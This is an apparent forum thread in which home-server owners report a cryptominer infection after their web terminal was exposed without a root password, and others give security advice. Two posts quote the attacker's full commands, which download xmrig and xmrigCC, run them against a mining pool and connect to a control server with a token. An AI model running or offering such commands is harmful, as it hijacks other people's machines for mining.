xmrig detected

[Zan]

Hi there,

A few days ago my server CPU cores were all at 100% - I assumed it was due to an errant docker container and didn't investigate further.

Today, while preparing for a cache drive upgrade, I inadvertently when through bash history and found that the xmrig crypto miner had been installed...

wget https://github.com/xmrig/xmrig/releases/download/v5.5.1/xmrig-5.5.1-xenial-x64.tar.gz && tar xvzf xmrig-5.5.1-xenial-x64.tar.gz && cd xmrig-5.5.1 && ./xmrig -a rx/sfx -o eu-de02.miningrigrentals.com:3333 -u km7670672.145246 -p x --donate-level=1 --tls --retries=10000

This command was executed sometime afterwards

xmrig -a rx/0 -o eu-01.miningrigrentals.com:3333 -u km7670672.145673 -p x --tls --retries=10000

I suspect what had happened was....

1. I upgraded my server to 6.8.1 (unraid-dvb build).

2. After rebooting, I found I couldn't login as root. I don't know whether this was done by a hacker, but I suspected a corruption of the /boot/config/shadow file, as I've had USB stick corruption on other USB sticks in the past, however the file didn't look corrupted, and even though in a Windows PC the USB stick was reported with errors, I selected the option to let Windows fix the errors, but it then reported that no errors were detected/fixed. The USB stick is a Sandisk 16GB stick, I thought this was a reasonably reliable brand/stick.

3. I used instructions on this forum to remove the root user password via a modification to /boot/config/shadow and was able to restart my server, login, and I used passwd from the command line to set the root user password. I didn't actually do any follow-up to confirm that the new password was applied.

4. A few days later I used ssh to login to the server and noticed that no password prompt was displayed, logged into the user page of webui and root user was reported as not set, so I set one.

5. A few days after that I noticed the CPU at 100%, and today noticed the xmrig statements in bash history 😒

 

It looks as though the exploiter was using webterminal to run the wget/xmrig commands above, eg. http://<myip>:8080/webterminal/

With no root password they would have gotten straight to a command line.

 

Hopefully this sounds plausible to people here, just wondering whether anyone can confirm that using passwd from the command line should have worked to change the root user password. If not, why?

I want to keep the ability to ssh into my server from anywhere, so aside from being more vigilant with my user passwords, can anyone suggest other things to improve the security on my server?

@Squid - perhaps enhance Fix Common Problems to check for blank user passwords?

 

Edited February 2, 2020 by Zan
Removed my ip from hyperlink

[itimpi]

Do you have the whole Unraid server exposed to the interned or have you just port forwarded the port required for ssh?

 

Is there any reason not to use a VPN now that the WireGuard VPN is built into Unraid as that would be far more secure?

 

[Zan]

2 minutes ago, itimpi said:

Do you have the whole Unraid server exposed to the interned or have you jest port forwarded the port required for ssh?

 

Is there any reason not to use a VPN now that the WireGuard VPN is built into Unraid as that would be far more secure?

1. Just forwarded specific ports

2. I will definitely use WireGuard, just haven't gotten around to it yet.

[bastl]

I think the first of all is to make sure you not make your server directly accessible from the internet. For me it sounds like you have at least port 22 forwarded to your Unraid server in your router. Also make sure that port 80 and 443 also are not directly forwarded to your server. If you wanna access your Unraid server on the go use a VPN to connect to your home. Current Unraid version 6.8.2 has Wireguard build in, or you can use OpenVPN as a Docker or you could use your routers function as a VPN server. Most of them have these functions build in these days. A simple raspberry PI is also an option to build up your VPN server. A couple weeks ago a user reported in the forum he found a couple unraid servers without a password protection online and if he could find the server others can do also. If someone not activly reading the forums he will not notice this. Not sure if Limetech got extra information from the user who found these servers to maybe contact the customer directly.

[eaglejonno]

I have just found EXACTLY the same thing. meaning its not a random thing.   this was pasted.

 

cd .. && cd .. && cd .. && cd .. && cd .. && cd .. && cd .. && cd .. && cd .. && cd .. && cd .. && cd .. && cd .. && cd var/tmp && mkdir t11113211 && cd t11113211 && wget https://github.com/Bendr0id/xmrigCC/releases/download/2.6.2/xmrigCC-2.6.2-with_tls_and_gzip-gcc7-linux-static-amd64.tar.gz && tar xvzf xmrigCC-2.6.2-with_tls_and_gzip-gcc7-linux-static-amd64.tar.gz && rm xmrigCC-2.6.2-with_tls_and_gzip-gcc7-linux-static-amd64.tar.gz && cd miner && chmod u+x xmrigDaemon* && ./xmrigDaemon* -a rx/0 -o eu-de02.miningrigrentals.com:3333 -u km7670672.145673 -p x --tls --retries=10000 --donate-level=1 --cc-url=40.76.222.123:3344 --cc-access-token=GArC5Qrsnjfkyna6CttkuJ

 

[itimpi]

On 2/2/2020 at 10:58 AM, Zan said:

Hopefully this sounds plausible to people here, just wondering whether anyone can confirm that using passwd from the command line should have worked to change the root user password. If not, why?

It was not mentioned when the original post was made but changing the password via the CLI is NOT the way to do it as that will only change it in RAM and not survive a reboot.  The correct way to do this is via the Users tab in the Unraid GUI.

[trurl]

5 hours ago, eaglejonno said:

its not a random thing

Not random. As suggested, possibly you have allowed your server to be hacked. Is your server directly on the internet? Or have you forwarded any ports to it?